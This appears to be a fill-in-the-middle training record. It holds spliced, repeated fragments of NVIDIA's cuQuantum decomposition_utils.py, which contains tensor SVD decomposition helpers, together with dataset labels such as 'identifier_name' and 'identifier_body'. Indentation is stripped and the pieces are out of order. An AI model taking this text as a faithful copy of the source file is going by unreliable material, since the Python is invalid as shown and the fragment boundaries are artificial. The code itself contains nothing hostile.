dtype = cutn.tensor_svd_algo_status_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_info_get_attribute
else:
raise ValueError("object type must be either config or info")
data = numpy.empty((1,), dtype=dtype)
getter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
return data
def set_svd_config_scalar_attr(handle, obj, attr, data, svd_algorithm=None):
"""
Set the data for given attribute of SVDConfig.
"""
setter = cutn.tensor_svd_config_set_attribute
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
raise ValueError(f"Algorithm specific parameters not supported for {svd_algorithm}")
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
if not isinstance(data, numpy.ndarray):
data = numpy.asarray(data, dtype=dtype)
setter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
def parse_svd_config(handle, svd_config, svd_method, logger=None):
"""
Given an SVDMethod object, set the corresponding attributes in the SVDConfig.
"""
svd_algorithm = None
for method_attr, attr in SVD_METHOD_CONFIG_MAP.items():
data = getattr(svd_method, method_attr)
if method_attr == 'partition':
data = PARTITION_MAP[data]
elif method_attr == 'normalization':
data = NORMALIZATION_MAP[data]
elif method_attr == 'algorithm':
svd_algorithm = data = SVD_ALGORITHM_MAP[data]
set_svd_config_scalar_attr(handle, svd_config, attr, data)
if logger is not None:
logger.info(f"The SVDConfig attribute '{method_attr}' has been set to {data}.")
algo_params = svd_method._get_algo_params()
if algo_params is not None:
set_svd_config_scalar_attr(handle, svd_config, cutn.TensorSVDConfigAttribute.ALGO_PARAMS, algo_params, svd_algorithm=svd_algorithm)
if logger is not None:
logger.info(f"The SVDConfig attribute '{cutn.TensorSVDConfigAttribute.ALGO_PARAMS}' has been set to {algo_params}.")
def get_svd_info_dict(handle, svd_info):
"""
Parse the information in SVDInfo in a dictionary object.
"""
info = dict()
for key, attr in SVD_INFO_MAP.items():
info[key] = get_svd_config_info_scalar_attr(handle, 'info', svd_info, attr).item()
svd_algorithm = info['algorithm']
algo_status = get_svd_config_info_scalar_attr(handle, 'info', svd_info, cutn.TensorSVDInfoAttribute.ALGO_STATUS, svd_algorithm=svd_algorithm)
info['algorithm'] = SVD_ALGORITHM_MAP_TO_STRING[svd_algorithm]
if algo_status is not None:
for name in algo_status.dtype.names:
key = info['algorithm'] + f'_{name}'
info[key] = algo_status[name].item()
return info
def parse_decompose_operands_options(options, wrapped_operands, allowed_dtype_names=None):
"""
Given initially wrapped tensors and network options, wrap the operands to device and create an internal NetworkOptions object.
If cutensornet library handle is not provided in `options`, one will be created in the internal options.
"""
device_id = utils.get_network_device_id(wrapped_operands)
logger = logging.getLogger() if options.logger is None else options.logger
operands_location = 'cuda'
if device_id is None:
operands_location = 'cpu'
device_id = options.device_id
logger.info(f"Begin transferring input data from host to device {device_id}")
wrapped_operands = tensor_wrapper.to(wrapped_operands, device_id)
logger.info("Input data transfer finished")
# initialize handle once if not provided
if options.handle is not None:
own_handle = False
handle = options.handle
else:
own_handle = True
with utils.device_ctx(device_id):
handle = cutn.create()
dtype_name = utils.get_operands_dtype(wrapped_operands)
if allowed_dtype_names is not None and dtype_name not in allowed_dtype_names:
raise ValueError(f"dtype {dtype_name} not supported")
compute_type = options.compute_type if options.compute_type is not None else typemaps.NAME_TO_COMPUTE_TYPE[dtype_name]
package = utils.get_operands_package(wrapped_operands)
allocator = options.allocator if options.allocator is not None else memory._MEMORY_MANAGER[package](device_id, logger)
internal_options = options.__class__(device_id=device_id,
logger=logger,
handle=handle,
blocking=options.blocking,
compute_type=compute_type,
memory_limit=options.memory_limit,
allocator=allocator)
return wrapped_operands, internal_options, own_handle, operands_location
def allocate_and_set_workspace(handle, allocator, workspace_desc, pref, mem_space, workspace_kind, device_id, stream, stream_ctx, logger, task_name=''):
"""
Allocate and set the workspace in the workspace descriptor.
"""
workspace_size = cutn.workspace_get_memory_size(handle, workspace_desc, pref, mem_space, workspace_kind)
# Allocate and set workspace
if mem_space == cutn.Memspace.DEVICE:
with utils.device_ctx(device_id), stream_ctx:
try:
logger.debug(f"Allocating device memory for {task_name}")
workspace_ptr = allocator.memalloc(workspace_size)
except TypeError as e:
message = "The method 'memalloc' in the allocator object must conform to the interface in the "\
"'BaseCUDAMemoryManager' protocol."
raise TypeError(message) from e
logger.debug(f"Finished allocating device memory of size {formatters.MemoryStr(workspace_size)} for decomposition in the context of stream {stream}.")
device_ptr = utils.get_ptr_from_memory_pointer(workspace_ptr)
cutn.workspace_set_memory(handle, workspace_desc, mem_space, workspace_kind, device_ptr, workspace_size)
logger.debug(f"The workspace memory (device pointer = {device_ptr}) has been set in the workspace descriptor.")
return workspace_ptr
elif workspace_size != 0:
# host workspace
logger.debug(f"Allocating host memory for {task_name}")
workspace_host = numpy.empty(workspace_size, dtype=numpy.int8)
logger.debug(f"Finished allocating host memory of size {formatters.MemoryStr(workspace_size)} for decomposition.")
cutn.workspace_set_memory(handle, workspace_desc, mem_space, workspace_kind, workspace_host.ctypes.data, workspace_size)
logger.debug(f"The workspace memory (host pointer = {workspace_host.ctypes.data}) has been set in the workspace descriptor.")
return workspace_host
else:
return None
def _destroy_tensor_descriptors(desc_tensors):
for t in desc_tensors:
if t is not None:
cutn.destroy_tensor_descriptor(t)
def | (handle, wrapped_operands, size_dict, inputs, outputs, mid_extent, method, device_id, stream_ctx, logger):
"""
Create empty tensor operands and corresponding tensor descriptors for a decomposition problem.
"""
# Create input tensor descriptors, output operands and output tensor descriptors
output_class = wrapped_operands[0].__class__
dtype_name = wrapped_operands[0].dtype
# Compute extents for the outputs
shared_mode_out = list(set(outputs[0]) & set(outputs[1]))[0]
output_extents = [tuple(size_dict[m] if m != shared_mode_out else mid_extent for m in modes) for modes in outputs]
logger.debug("Creating input tensor descriptors.")
input_tensor_descriptors = []
output_tensor_descriptors = []
try:
for (t, modes) in zip(wrapped_operands, inputs):
input_tensor_descriptors.append(t.create_tensor_descriptor(handle, modes))
logger.debug("The input tensor descriptors have been created.")
# Create the output in the context of the current stream to work around a performance issue with CuPy's memory pool.
logger.debug("Beginning output tensors and descriptors creation...")
s = None
s_ptr = 0
output_operands = []
with utils.device_ctx(device_id):
for extent, tensor_modes in zip(output_extents, outputs):
operand = utils.create_empty_tensor(output_class, extent, dtype_name, device_id, stream_ctx)
output_operands.append(operand)
output_tensor_descriptors.append(operand.create_tensor_descriptor(handle, tensor_modes))
if hasattr(method, 'partition') and method.partition is None:
if dtype_name in ['float32', 'complex64']:
s_dtype_name = 'float32'
elif dtype_name in ['float64', 'complex128']:
s_dtype_name = 'float64'
else:
raise ValueError(f"{dtype_name} data type not supported")
s = utils.create_empty_tensor(output_class, (mid_extent, ), s_dtype_name, device_id, stream_ctx)
s_ptr = s.data_ptr
logger.debug("The output tensors and descriptors have been created.")
except:
_destroy_tensor_descriptors(input_tensor_descriptors)
_destroy_tensor_descriptors(output_tensor_descriptors)
raise
return input_tensor_descriptors, output_operands, output_tensor_descriptors, s, s_ptr
def get_return_operand_data(tensor, target_location):
"""
Given wrapped tensors, fetch the return operands based on target location.
"""
if tensor is None: # potentially for s
return tensor
if target_location == 'cpu':
return tensor.to('cpu')
else: # already on device
return tensor.tensor
| create_operands_and_descriptors | identifier_name |
decomposition_utils.py | # Copyright (c) 2023, NVIDIA CORPORATION & AFFILIATES
#
# SPDX-License-Identifier: BSD-3-Clause
"""
A collection of utility functions for decomposition.
"""
import logging
import numpy
from . import einsum_parser
from . import formatters
from . import tensor_wrapper
from . import typemaps
from . import utils
from .. import cutensornet as cutn
from .. import memory
DECOMPOSITION_DTYPE_NAMES = ('float32', 'float64', 'complex64', 'complex128')
#TODO: auto generate the maps below
PARTITION_MAP = {None: cutn.TensorSVDPartition.NONE,
'U': cutn.TensorSVDPartition.US,
'V': cutn.TensorSVDPartition.SV,
'UV': cutn.TensorSVDPartition.UV_EQUAL}
NORMALIZATION_MAP = {None: cutn.TensorSVDNormalization.NONE,
'L1': cutn.TensorSVDNormalization.L1,
'L2': cutn.TensorSVDNormalization.L2,
'LInf': cutn.TensorSVDNormalization.LINF}
SVD_ALGORITHM_MAP = {'gesvd': cutn.TensorSVDAlgo.GESVD,
'gesvdj': cutn.TensorSVDAlgo.GESVDJ,
'gesvdp': cutn.TensorSVDAlgo.GESVDP,
'gesvdr': cutn.TensorSVDAlgo.GESVDR}
SVD_ALGORITHM_MAP_TO_STRING = dict((val, key) for key, val in SVD_ALGORITHM_MAP.items())
SVD_METHOD_CONFIG_MAP = {'abs_cutoff': cutn.TensorSVDConfigAttribute.ABS_CUTOFF,
'rel_cutoff': cutn.TensorSVDConfigAttribute.REL_CUTOFF,
'partition': cutn.TensorSVDConfigAttribute.S_PARTITION,
'normalization': cutn.TensorSVDConfigAttribute.S_NORMALIZATION,
'algorithm': cutn.TensorSVDConfigAttribute.ALGO}
SVD_INFO_MAP = {'full_extent': cutn.TensorSVDInfoAttribute.FULL_EXTENT,
'reduced_extent': cutn.TensorSVDInfoAttribute.REDUCED_EXTENT,
'discarded_weight': cutn.TensorSVDInfoAttribute.DISCARDED_WEIGHT,
'algorithm': cutn.TensorSVDInfoAttribute.ALGO}
def compute_combined_size(size_dict, modes):
"""
Given the modes, compute the product of all extents using information in size_dict.
"""
size = 1
for mode in modes:
size *= size_dict[mode]
return size
def parse_decomposition_subscripts(subscripts):
"""
Parse decomposition expression in string format, retaining ellipses if present.
"""
input_modes, *output_modes = subscripts.split("->")
if not output_modes:
raise ValueError("Output modes must be explicitly specified for decomposition")
if len(output_modes) > 1:
raise ValueError("subscripts must contain only 1 ->")
input_modes = input_modes.split(",")
output_modes = output_modes[0].split(",")
if len(output_modes) != 2:
raise ValueError("subscripts must specify the modes for both left and right tensors")
return input_modes, output_modes
def compute_mid_extent(size_dict, inputs, outputs):
"""
Compute the expected mid extent given a size_dict and the modes for both inputs and outputs.
"""
size_dict = size_dict.copy() # this func will modify it in place
left_output = set(outputs[0])
right_output = set(outputs[1])
shared_mode_out = set(left_output) & set(right_output)
if len(shared_mode_out) !=1:
raise ValueError(f"Expect one shared mode in the output tensors, found {len(shared_mode_out)}")
left_output -= shared_mode_out
right_output -= shared_mode_out
for _input in inputs:
left_extent = right_extent = remaining_extent = 1
left_modes = set()
right_modes = set()
for mode in _input:
extent = size_dict[mode]
if mode in left_output:
left_extent *= extent
left_modes.add(mode)
elif mode in right_output:
right_extent *= extent
right_modes.add(mode)
else:
remaining_extent *= extent
if right_extent * remaining_extent < left_extent:
# update left modes
left_mode_collapsed = left_modes.pop()
size_dict[left_mode_collapsed] = right_extent * remaining_extent
left_output -= left_modes
elif left_extent * remaining_extent < right_extent:
# update right modes
right_mode_collapsed = right_modes.pop()
size_dict[right_mode_collapsed] = left_extent * remaining_extent
right_output -= right_modes
left_extent = compute_combined_size(size_dict, left_output)
right_extent = compute_combined_size(size_dict, right_output)
return min(left_extent, right_extent)
def parse_decomposition(subscripts, *operands):
"""
Parse the generalized decomposition expression in string formats (unicode strings supported).
The modes for the outputs must be specified.
Returns wrapped operands, mapped inputs and output, size dictionary based on internal mode numbers,
the forward as well as the reverse mode maps, and the largest mid extent expected for the decomposition.
"""
inputs, outputs = parse_decomposition_subscripts(subscripts)
num_operand, num_input = len(operands), len(inputs)
if num_operand != num_input:
message = f"""Operand-term mismatch. The number of operands ({num_operand}) must match the number of inputs ({num_input}) specified in the decomposition expression."""
raise ValueError(message)
morpher = einsum_parser.select_morpher(False)
# First wrap operands.
operands = tensor_wrapper.wrap_operands(operands)
inputs = list(einsum_parser.parse_single(_input) for _input in inputs)
outputs = list(einsum_parser.parse_single(_output) for _output in outputs)
ellipses_input = any(Ellipsis in _input for _input in inputs)
num_ellipses_output = sum(Ellipsis in _output for _output in outputs)
if num_ellipses_output > 1:
raise ValueError(f"Ellipses found in {num_ellipses_output} output terms, only allowed in one at most.")
if ellipses_input:
if num_input == 1 and num_ellipses_output == 0:
raise ValueError("tensor.decompose does not support reduction operations")
einsum_parser.check_ellipses(inputs+outputs, morpher)
else:
if num_ellipses_output != 0:
raise ValueError("Invalid ellipsis specification. The output terms contain ellipsis while none of the input terms do.")
einsum_parser.check_einsum_with_operands(inputs, operands, morpher)
# Map data to ordinals for cutensornet.
num_extra_labels = max(len(o.shape) for o in operands) if ellipses_input else 0
all_modes, _, mode_map_user_to_ord, mode_map_ord_to_user, label_end = einsum_parser.map_modes(inputs + outputs, None, num_extra_labels, morpher)
mapper = einsum_parser.ModeLabelMapper(mode_map_ord_to_user)
mapping_morpher = einsum_parser.select_morpher(False, mapper)
# Replace ellipses with concrete labels
if ellipses_input:
if num_input == 1:
# For tensor.decompose only
n = len(operands[0].shape) - (len(inputs[0]) -1)
else:
num_implicit_modes = set()
for i, o in enumerate(operands):
_input = all_modes[i]
if Ellipsis not in _input:
continue
n = len(o.shape) - (len(_input) - 1)
assert n >= 0, "Internal error"
num_implicit_modes.add(n)
if len(num_implicit_modes) != 1:
#NOTE: Although we can allow ellipsis denoting different number of modes,
# here we disable it due to limited use case if any and potential confusion due to implicit specification.
raise ValueError(f"Ellipsis for all operands must refer to equal number of modes, found {num_implicit_modes}")
n = num_implicit_modes.pop()
ellipses_modes = tuple(range(label_end-n, label_end))
for i, _modes in enumerate(all_modes):
if Ellipsis not in _modes:
continue
s = _modes.index(Ellipsis)
all_modes[i] = _modes[:s] + ellipses_modes + _modes[s+1:]
inputs = all_modes[:num_input]
outputs = all_modes[num_input:]
if num_input == 1:
contracted_modes_output = set(einsum_parser.infer_output_mode_labels(outputs))
if contracted_modes_output != set(inputs[0]):
raise ValueError("The contracted outcome from the right hand side of the expression does not match the input")
# Create mode-extent map based on internal mode numbers.
size_dict = einsum_parser.create_size_dict(inputs, operands)
# Compute the maximally allowed mid extent
mid_extent = compute_mid_extent(size_dict, inputs, outputs)
return operands, inputs, outputs, size_dict, mode_map_user_to_ord, mode_map_ord_to_user, mid_extent
def get_svd_config_info_scalar_attr(handle, obj_type, obj, attr, svd_algorithm=None):
"""
Get the data for given attribute of SVDConfig or SVDInfo.
"""
if obj_type == 'config':
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
return None
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_config_get_attribute
elif obj_type == 'info':
if attr != cutn.TensorSVDInfoAttribute.ALGO_STATUS:
dtype = cutn.tensor_svd_info_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDP):
return None
dtype = cutn.tensor_svd_algo_status_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_info_get_attribute
else:
raise ValueError("object type must be either config or info")
data = numpy.empty((1,), dtype=dtype)
getter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
return data
def set_svd_config_scalar_attr(handle, obj, attr, data, svd_algorithm=None):
"""
Set the data for given attribute of SVDConfig.
"""
setter = cutn.tensor_svd_config_set_attribute
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
raise ValueError(f"Algorithm specific parameters not supported for {svd_algorithm}")
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
if not isinstance(data, numpy.ndarray):
data = numpy.asarray(data, dtype=dtype)
setter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
def parse_svd_config(handle, svd_config, svd_method, logger=None):
|
def get_svd_info_dict(handle, svd_info):
"""
Parse the information in SVDInfo in a dictionary object.
"""
info = dict()
for key, attr in SVD_INFO_MAP.items():
info[key] = get_svd_config_info_scalar_attr(handle, 'info', svd_info, attr).item()
svd_algorithm = info['algorithm']
algo_status = get_svd_config_info_scalar_attr(handle, 'info', svd_info, cutn.TensorSVDInfoAttribute.ALGO_STATUS, svd_algorithm=svd_algorithm)
info['algorithm'] = SVD_ALGORITHM_MAP_TO_STRING[svd_algorithm]
if algo_status is not None:
for name in algo_status.dtype.names:
key = info['algorithm'] + f'_{name}'
info[key] = algo_status[name].item()
return info
def parse_decompose_operands_options(options, wrapped_operands, allowed_dtype_names=None):
"""
Given initially wrapped tensors and network options, wrap the operands to device and create an internal NetworkOptions object.
If cutensornet library handle is not provided in `options`, one will be created in the internal options.
"""
device_id = utils.get_network_device_id(wrapped_operands)
logger = logging.getLogger() if options.logger is None else options.logger
operands_location = 'cuda'
if device_id is None:
operands_location = 'cpu'
device_id = options.device_id
logger.info(f"Begin transferring input data from host to device {device_id}")
wrapped_operands = tensor_wrapper.to(wrapped_operands, device_id)
logger.info("Input data transfer finished")
# initialize handle once if not provided
if options.handle is not None:
own_handle = False
handle = options.handle
else:
own_handle = True
with utils.device_ctx(device_id):
handle = cutn.create()
dtype_name = utils.get_operands_dtype(wrapped_operands)
if allowed_dtype_names is not None and dtype_name not in allowed_dtype_names:
raise ValueError(f"dtype {dtype_name} not supported")
compute_type = options.compute_type if options.compute_type is not None else typemaps.NAME_TO_COMPUTE_TYPE[dtype_name]
package = utils.get_operands_package(wrapped_operands)
allocator = options.allocator if options.allocator is not None else memory._MEMORY_MANAGER[package](device_id, logger)
internal_options = options.__class__(device_id=device_id,
logger=logger,
handle=handle,
blocking=options.blocking,
compute_type=compute_type,
memory_limit=options.memory_limit,
allocator=allocator)
return wrapped_operands, internal_options, own_handle, operands_location
def allocate_and_set_workspace(handle, allocator, workspace_desc, pref, mem_space, workspace_kind, device_id, stream, stream_ctx, logger, task_name=''):
"""
Allocate and set the workspace in the workspace descriptor.
"""
workspace_size = cutn.workspace_get_memory_size(handle, workspace_desc, pref, mem_space, workspace_kind)
# Allocate and set workspace
if mem_space == cutn.Memspace.DEVICE:
with utils.device_ctx(device_id), stream_ctx:
try:
logger.debug(f"Allocating device memory for {task_name}")
workspace_ptr = allocator.memalloc(workspace_size)
except TypeError as e:
message = "The method 'memalloc' in the allocator object must conform to the interface in the "\
"'BaseCUDAMemoryManager' protocol."
raise TypeError(message) from e
logger.debug(f"Finished allocating device memory of size {formatters.MemoryStr(workspace_size)} for decomposition in the context of stream {stream}.")
device_ptr = utils.get_ptr_from_memory_pointer(workspace_ptr)
cutn.workspace_set_memory(handle, workspace_desc, mem_space, workspace_kind, device_ptr, workspace_size)
logger.debug(f"The workspace memory (device pointer = {device_ptr}) has been set in the workspace descriptor.")
return workspace_ptr
elif workspace_size != 0:
# host workspace
logger.debug(f"Allocating host memory for {task_name}")
workspace_host = numpy.empty(workspace_size, dtype=numpy.int8)
logger.debug(f"Finished allocating host memory of size {formatters.MemoryStr(workspace_size)} for decomposition.")
cutn.workspace_set_memory(handle, workspace_desc, mem_space, workspace_kind, workspace_host.ctypes.data, workspace_size)
logger.debug(f"The workspace memory (host pointer = {workspace_host.ctypes.data}) has been set in the workspace descriptor.")
return workspace_host
else:
return None
def _destroy_tensor_descriptors(desc_tensors):
for t in desc_tensors:
if t is not None:
cutn.destroy_tensor_descriptor(t)
def create_operands_and_descriptors(handle, wrapped_operands, size_dict, inputs, outputs, mid_extent, method, device_id, stream_ctx, logger):
"""
Create empty tensor operands and corresponding tensor descriptors for a decomposition problem.
"""
# Create input tensor descriptors, output operands and output tensor descriptors
output_class = wrapped_operands[0].__class__
dtype_name = wrapped_operands[0].dtype
# Compute extents for the outputs
shared_mode_out = list(set(outputs[0]) & set(outputs[1]))[0]
output_extents = [tuple(size_dict[m] if m != shared_mode_out else mid_extent for m in modes) for modes in outputs]
logger.debug("Creating input tensor descriptors.")
input_tensor_descriptors = []
output_tensor_descriptors = []
try:
for (t, modes) in zip(wrapped_operands, inputs):
input_tensor_descriptors.append(t.create_tensor_descriptor(handle, modes))
logger.debug("The input tensor descriptors have been created.")
# Create the output in the context of the current stream to work around a performance issue with CuPy's memory pool.
logger.debug("Beginning output tensors and descriptors creation...")
s = None
s_ptr = 0
output_operands = []
with utils.device_ctx(device_id):
for extent, tensor_modes in zip(output_extents, outputs):
operand = utils.create_empty_tensor(output_class, extent, dtype_name, device_id, stream_ctx)
output_operands.append(operand)
output_tensor_descriptors.append(operand.create_tensor_descriptor(handle, tensor_modes))
if hasattr(method, 'partition') and method.partition is None:
if dtype_name in ['float32', 'complex64']:
s_dtype_name = 'float32'
elif dtype_name in ['float64', 'complex128']:
s_dtype_name = 'float64'
else:
raise ValueError(f"{dtype_name} data type not supported")
s = utils.create_empty_tensor(output_class, (mid_extent, ), s_dtype_name, device_id, stream_ctx)
s_ptr = s.data_ptr
logger.debug("The output tensors and descriptors have been created.")
except:
_destroy_tensor_descriptors(input_tensor_descriptors)
_destroy_tensor_descriptors(output_tensor_descriptors)
raise
return input_tensor_descriptors, output_operands, output_tensor_descriptors, s, s_ptr
def get_return_operand_data(tensor, target_location):
"""
Given wrapped tensors, fetch the return operands based on target location.
"""
if tensor is None: # potentially for s
return tensor
if target_location == 'cpu':
return tensor.to('cpu')
else: # already on device
return tensor.tensor
| """
Given an SVDMethod object, set the corresponding attributes in the SVDConfig.
"""
svd_algorithm = None
for method_attr, attr in SVD_METHOD_CONFIG_MAP.items():
data = getattr(svd_method, method_attr)
if method_attr == 'partition':
data = PARTITION_MAP[data]
elif method_attr == 'normalization':
data = NORMALIZATION_MAP[data]
elif method_attr == 'algorithm':
svd_algorithm = data = SVD_ALGORITHM_MAP[data]
set_svd_config_scalar_attr(handle, svd_config, attr, data)
if logger is not None:
logger.info(f"The SVDConfig attribute '{method_attr}' has been set to {data}.")
algo_params = svd_method._get_algo_params()
if algo_params is not None:
set_svd_config_scalar_attr(handle, svd_config, cutn.TensorSVDConfigAttribute.ALGO_PARAMS, algo_params, svd_algorithm=svd_algorithm)
if logger is not None:
logger.info(f"The SVDConfig attribute '{cutn.TensorSVDConfigAttribute.ALGO_PARAMS}' has been set to {algo_params}.") | identifier_body |
decomposition_utils.py | # Copyright (c) 2023, NVIDIA CORPORATION & AFFILIATES
#
# SPDX-License-Identifier: BSD-3-Clause
"""
A collection of utility functions for decomposition.
"""
import logging
import numpy
from . import einsum_parser
from . import formatters
from . import tensor_wrapper
from . import typemaps
from . import utils
from .. import cutensornet as cutn
from .. import memory
DECOMPOSITION_DTYPE_NAMES = ('float32', 'float64', 'complex64', 'complex128')
#TODO: auto generate the maps below
PARTITION_MAP = {None: cutn.TensorSVDPartition.NONE,
'U': cutn.TensorSVDPartition.US,
'V': cutn.TensorSVDPartition.SV,
'UV': cutn.TensorSVDPartition.UV_EQUAL}
NORMALIZATION_MAP = {None: cutn.TensorSVDNormalization.NONE,
'L1': cutn.TensorSVDNormalization.L1,
'L2': cutn.TensorSVDNormalization.L2,
'LInf': cutn.TensorSVDNormalization.LINF}
SVD_ALGORITHM_MAP = {'gesvd': cutn.TensorSVDAlgo.GESVD,
'gesvdj': cutn.TensorSVDAlgo.GESVDJ,
'gesvdp': cutn.TensorSVDAlgo.GESVDP,
'gesvdr': cutn.TensorSVDAlgo.GESVDR}
SVD_ALGORITHM_MAP_TO_STRING = dict((val, key) for key, val in SVD_ALGORITHM_MAP.items())
SVD_METHOD_CONFIG_MAP = {'abs_cutoff': cutn.TensorSVDConfigAttribute.ABS_CUTOFF,
'rel_cutoff': cutn.TensorSVDConfigAttribute.REL_CUTOFF,
'partition': cutn.TensorSVDConfigAttribute.S_PARTITION,
'normalization': cutn.TensorSVDConfigAttribute.S_NORMALIZATION,
'algorithm': cutn.TensorSVDConfigAttribute.ALGO}
SVD_INFO_MAP = {'full_extent': cutn.TensorSVDInfoAttribute.FULL_EXTENT,
'reduced_extent': cutn.TensorSVDInfoAttribute.REDUCED_EXTENT,
'discarded_weight': cutn.TensorSVDInfoAttribute.DISCARDED_WEIGHT,
'algorithm': cutn.TensorSVDInfoAttribute.ALGO}
def compute_combined_size(size_dict, modes):
"""
Given the modes, compute the product of all extents using information in size_dict.
"""
size = 1
for mode in modes:
size *= size_dict[mode]
return size
def parse_decomposition_subscripts(subscripts):
"""
Parse decomposition expression in string format, retaining ellipses if present.
"""
input_modes, *output_modes = subscripts.split("->")
if not output_modes:
raise ValueError("Output modes must be explicitly specified for decomposition")
if len(output_modes) > 1:
raise ValueError("subscripts must contain only 1 ->")
input_modes = input_modes.split(",")
output_modes = output_modes[0].split(",")
if len(output_modes) != 2:
raise ValueError("subscripts must specify the modes for both left and right tensors")
return input_modes, output_modes
def compute_mid_extent(size_dict, inputs, outputs):
"""
Compute the expected mid extent given a size_dict and the modes for both inputs and outputs.
"""
size_dict = size_dict.copy() # this func will modify it in place
left_output = set(outputs[0])
right_output = set(outputs[1])
shared_mode_out = set(left_output) & set(right_output)
if len(shared_mode_out) !=1:
raise ValueError(f"Expect one shared mode in the output tensors, found {len(shared_mode_out)}")
left_output -= shared_mode_out
right_output -= shared_mode_out
for _input in inputs:
left_extent = right_extent = remaining_extent = 1
left_modes = set()
right_modes = set()
for mode in _input:
extent = size_dict[mode]
if mode in left_output:
left_extent *= extent
left_modes.add(mode)
elif mode in right_output:
right_extent *= extent
right_modes.add(mode)
else:
remaining_extent *= extent
if right_extent * remaining_extent < left_extent:
# update left modes
left_mode_collapsed = left_modes.pop()
size_dict[left_mode_collapsed] = right_extent * remaining_extent
left_output -= left_modes
elif left_extent * remaining_extent < right_extent:
# update right modes
right_mode_collapsed = right_modes.pop()
size_dict[right_mode_collapsed] = left_extent * remaining_extent
right_output -= right_modes
left_extent = compute_combined_size(size_dict, left_output)
right_extent = compute_combined_size(size_dict, right_output)
return min(left_extent, right_extent)
def parse_decomposition(subscripts, *operands):
"""
Parse the generalized decomposition expression in string formats (unicode strings supported).
The modes for the outputs must be specified.
Returns wrapped operands, mapped inputs and output, size dictionary based on internal mode numbers,
the forward as well as the reverse mode maps, and the largest mid extent expected for the decomposition.
"""
inputs, outputs = parse_decomposition_subscripts(subscripts)
num_operand, num_input = len(operands), len(inputs)
if num_operand != num_input:
message = f"""Operand-term mismatch. The number of operands ({num_operand}) must match the number of inputs ({num_input}) specified in the decomposition expression."""
raise ValueError(message)
morpher = einsum_parser.select_morpher(False)
# First wrap operands.
operands = tensor_wrapper.wrap_operands(operands)
inputs = list(einsum_parser.parse_single(_input) for _input in inputs)
outputs = list(einsum_parser.parse_single(_output) for _output in outputs)
ellipses_input = any(Ellipsis in _input for _input in inputs)
num_ellipses_output = sum(Ellipsis in _output for _output in outputs)
if num_ellipses_output > 1:
raise ValueError(f"Ellipses found in {num_ellipses_output} output terms, only allowed in one at most.")
if ellipses_input:
if num_input == 1 and num_ellipses_output == 0:
raise ValueError("tensor.decompose does not support reduction operations")
einsum_parser.check_ellipses(inputs+outputs, morpher)
else:
if num_ellipses_output != 0:
raise ValueError("Invalid ellipsis specification. The output terms contain ellipsis while none of the input terms do.")
einsum_parser.check_einsum_with_operands(inputs, operands, morpher)
# Map data to ordinals for cutensornet.
num_extra_labels = max(len(o.shape) for o in operands) if ellipses_input else 0
all_modes, _, mode_map_user_to_ord, mode_map_ord_to_user, label_end = einsum_parser.map_modes(inputs + outputs, None, num_extra_labels, morpher)
mapper = einsum_parser.ModeLabelMapper(mode_map_ord_to_user)
mapping_morpher = einsum_parser.select_morpher(False, mapper)
# Replace ellipses with concrete labels
if ellipses_input:
if num_input == 1:
# For tensor.decompose only
n = len(operands[0].shape) - (len(inputs[0]) -1)
else:
num_implicit_modes = set()
for i, o in enumerate(operands):
_input = all_modes[i]
if Ellipsis not in _input:
continue
n = len(o.shape) - (len(_input) - 1)
assert n >= 0, "Internal error"
num_implicit_modes.add(n)
if len(num_implicit_modes) != 1:
#NOTE: Although we can allow ellipsis denoting different number of modes,
# here we disable it due to limited use case if any and potential confusion due to implicit specification.
|
n = num_implicit_modes.pop()
ellipses_modes = tuple(range(label_end-n, label_end))
for i, _modes in enumerate(all_modes):
if Ellipsis not in _modes:
continue
s = _modes.index(Ellipsis)
all_modes[i] = _modes[:s] + ellipses_modes + _modes[s+1:]
inputs = all_modes[:num_input]
outputs = all_modes[num_input:]
if num_input == 1:
contracted_modes_output = set(einsum_parser.infer_output_mode_labels(outputs))
if contracted_modes_output != set(inputs[0]):
raise ValueError("The contracted outcome from the right hand side of the expression does not match the input")
# Create mode-extent map based on internal mode numbers.
size_dict = einsum_parser.create_size_dict(inputs, operands)
# Compute the maximally allowed mid extent
mid_extent = compute_mid_extent(size_dict, inputs, outputs)
return operands, inputs, outputs, size_dict, mode_map_user_to_ord, mode_map_ord_to_user, mid_extent
def get_svd_config_info_scalar_attr(handle, obj_type, obj, attr, svd_algorithm=None):
"""
Get the data for given attribute of SVDConfig or SVDInfo.
"""
if obj_type == 'config':
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
return None
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_config_get_attribute
elif obj_type == 'info':
if attr != cutn.TensorSVDInfoAttribute.ALGO_STATUS:
dtype = cutn.tensor_svd_info_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDP):
return None
dtype = cutn.tensor_svd_algo_status_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_info_get_attribute
else:
raise ValueError("object type must be either config or info")
data = numpy.empty((1,), dtype=dtype)
